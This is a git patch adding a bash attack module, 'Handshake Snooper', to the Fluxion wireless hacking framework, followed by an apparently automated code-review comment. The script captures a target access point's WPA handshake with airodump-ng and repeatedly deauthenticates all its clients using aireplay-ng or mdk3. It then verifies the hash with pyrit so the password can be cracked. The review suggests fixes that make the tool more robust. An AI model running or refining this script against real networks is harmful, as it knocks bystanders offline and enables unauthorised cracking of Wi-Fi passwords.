From 708e5dc9d96695ff259d3f3f8d7a24511d1fe6ae Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Tue, 8 Aug 2017 13:21:46 -0500 Subject: [PATCH] Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
---
 attacks/Handshake Snooper/attack.sh | 172 ++++++++++++++++++++++++++++
 1 file changed, 172 insertions(+)
 create mode 100755 attacks/Handshake Snooper/attack.sh
diff --git a/attacks/Handshake Snooper/attack.sh b/attacks/Handshake Snooper/attack.sh
new file mode 100755
index 0000000..5eb7ca3
--- /dev/null
+++ b/attacks/Handshake Snooper/attack.sh
@@ -0,0 +1,172 @@
+#!/bin/bash
+
+########################### < Handshake Snooper Parameters > ###########################
+
+HandshakeSnooperState="Not Ready"
+
+################################# < Handshake Snooper > ################################
+function handshake_verifier_daemon() {
+ if [ ${#@} -lt 5 ]; then return 1; fi
+
+ handshakeVerifierState="running"
+
+ function handle_verifier_abort() {
+ handshakeVerifierState="aborted"
+ }
+
+ trap handle_verifier_abort SIGABRT
+
+ source lib/HashUtils.sh
+
+ local handshakeCheckResult=1 # Assume invalid
+ while [ $handshakeCheckResult -ne 0 -a "$handshakeVerifierState" = "running" ]; do
+ sleep 3
+ pyrit -r $4 -o ${4/.cap/-clean.cap} stripLive
+ hash_check_handshake $3 ${4/.cap/-clean.cap} "${@:5:2}"
+ handshakeCheckResult=$?
+ done
+
+ # If handshake didn't pass verification, it was aborted.
+ if [ $handshakeCheckResult -ne 0 ]; then return 1; fi
+
+ mv "${4/.cap/-clean.cap}" "$2"
+
+ # Signal parent process the verification terminated.
+ kill -s SIGABRT $1
+}
+
+function handshake_stop_verifier() {
+ if [ "$HANDSHAKEVerifierPID" ]; then
+ kill -s SIGABRT $HANDSHAKEVerifierPID &> $FLUXIONOutputDevice
+ fi
+
+ HANDSHAKEVerifierPID=""
+}
+
+# Parameters: path, SSID, MAC
+function handshake_start_verifier() {
+ # if [ ${#@} -lt 3 ]; then return 1; fi
+ handshake_verifier_daemon $$ \
+ $FLUXIONPath/attacks/Handshake\ Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap \
+ $HANDSHAKEVerifier $FLUXIONWorkspacePath/capture/dump-01.cap \
+ "$APTargetSSID" "$APTargetMAC" &> $FLUXIONOutputDevice &
+ HANDSHAKEVerifierPID=$!
+}
+
+function handshake_stop_deauthenticator() {
+ if [ "$HANDSHAKEDeauthenticatorPID" ]; then
+ kill $HANDSHAKEDeauthenticatorPID &> $FLUXIONOutputDevice
+ fi
+
+ HANDSHAKEDeauthenticatorPID=""
+}
+
+function handshake_start_deauthenticator() {
+ if [ "$HANDSHAKEDeauthenticatorPID" ]; then return 0; fi
+
+ case "$HANDSHAKEMethod" in
+ "aireplay-ng"*) xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \
+ aireplay-ng --deauth=9999999999 -a $APTargetMAC --ignore-negative-one $WIMonitor &
+ HANDSHAKEDeauthenticatorPID=$!;;
+ "mdk3"*) xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \
+ mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3.txt -c $APTargetChannel &
+ HANDSHAKEDeauthenticatorPID=$!;;
+ esac
+}
+
+function handshake_stop_captor() {
+ if [ "$HANDSHAKECaptorPID" ]; then
+ kill $HANDSHAKECaptorPID &> $FLUXIONOutputDevice
+ fi
+
+ HANDSHAKECaptorPID=""
+}
+
+function handshake_start_captor() {
+ if [ "$HANDSHAKECaptorPID" ]; then return 0; fi
+
+ xterm -hold -title "Handshake Captor (CH $APTargetChannel)" $TOPRIGHT -bg "#000000" -fg "#FFFFFF" -e \
+ airodump-ng -d $APTargetMAC -w $FLUXIONWorkspacePath/capture/dump -c $APTargetChannel -a $WIMonitor &
+
+ sleep 3
+ HANDSHAKECaptorPID=$(ps a | awk '$5~/^airodump-ng/ && $7~/'"$APTargetMAC"'/{print $1}')
+}
+
+function handshake_unset_method() {
+ HANDSHAKEMethod=""
+}
+
+function handshake_set_method() {
+ if [ "$HANDSHAKEMethod" ]; then return 0; fi
+
+ local methods=("Monitor (${CYel}passive$CClr)" "aireplay-ng deauthentication (${CRed}aggressive$CClr)" "mdk3 deauthentication (${CRed}aggressive$CClr)" "$general_back")
+ io_query_choice "Select a method of handshake retrieval" methods[@]
+
+ HANDSHAKEMethod=$IOQueryChoice
+
+ if [ "$HANDSHAKEMethod" = "$general_back" ]; then
+ handshake_unset_method
+ return 1
+ fi
+}
+
+function handshake_unset_verifier() {
+ HANDSHAKEVerifier=""
+}
+
+function handshake_set_verifier() {
+ if [ "$HANDSHAKEVerifier" ]; then return 0; fi
+
+ local verifiers=("pyrit" "aircrack-ng" "$general_back") # "pyrit (${CGrn}recommended$CClr)" "aircrack-ng (unreliable)")
+ io_query_choice "Select a method of handshake retrieval" verifiers[@]
+
+ HANDSHAKEVerifier=$IOQueryChoice
+
+ if [ "$HANDSHAKEVerifier" = "$general_back" ]; then
+ handshake_unset_verifier
+ handshake_unset_method
+ return 1
+ fi
+}
+
+function unprep_attack() {
+ HandshakeSnooperState="Not Ready"
+ handshake_unset_verifier
+ handshake_unset_method
+
+ sandbox_remove_workfile "$FLUXIONWorkspacePath/capture"
+}
+
+function prep_attack() {
+ # if [ ${#@} -ne 3 ]; then return 1; fi
+
+ mkdir $FLUXIONWorkspacePath/capture
+
+ while true; do
+ handshake_set_method; if [ $? -ne 0 ]; then break; fi
+ handshake_set_verifier; if [ $? -ne 0 ]; then continue; fi
+ HandshakeSnooperState="Ready"
+ break
+ done
+
+ # Check for handshake abortion.
+ if [ "$HandshakeSnooperState" = "Not Ready" ]; then
+ unprep_attack
+ return 1;
+ fi
+}
+
+function stop_attack() {
+ handshake_stop_deauthenticator
+ handshake_stop_verifier
+ handshake_stop_captor
+ handshake_unset_verifier
+}
+
+# Parameters: path, SSID, MAC
+function start_attack() {
+ handshake_start_captor
+ handshake_start_deauthenticator
+ handshake_start_verifier
+}
+# FLUXSCRIPT END
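Review bot: In handshake_start_verifier the arguments handed to handshake_verifier_daemon are unquoted, so a `$FLUXIONPath`, `$APTargetSSIDClean` or `$APTargetMAC` containing whitespace or glob characters word-splits and shifts `$2`..`$5` inside the daemon, after which `mv "${4/.cap/-clean.cap}" "$2"` writes the handshake somewhere other than the intended path — and the SSID and MAC come from beacons the target network controls, so whatever sanitization produced `APTargetSSIDClean` elsewhere should not be the only guard. Quote the three call lines, `handshake_verifier_daemon "$$" \`, `"$FLUXIONPath/attacks/Handshake Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap" \`, `"$HANDSHAKEVerifier" "$FLUXIONWorkspacePath/capture/dump-01.cap" \`, and quote `$3`/`$4` on the pyrit and hash_check_handshake lines the same way. The same over-the-air value is spliced into an awk regex in handshake_start_captor (`$7~/'"$APTargetMAC"'/`); passing it with `awk -v mac="$APTargetMAC"` and matching via `index($7, mac)` avoids regex metacharacters, and the PID scan over `ps a` would otherwise also pick up any unrelated airodump-ng on the host whose arguments happen to match. Two caveats worth a comment next to the daemon: `kill -s SIGABRT $1` only signals cleanly if the parent shell has installed a SIGABRT trap, which this hunk does not show (the default action terminates it), and `source lib/HashUtils.sh` resolves against the current working directory rather than `$FLUXIONPath`, so the verifier silently fails if the attack is started from elsewhere.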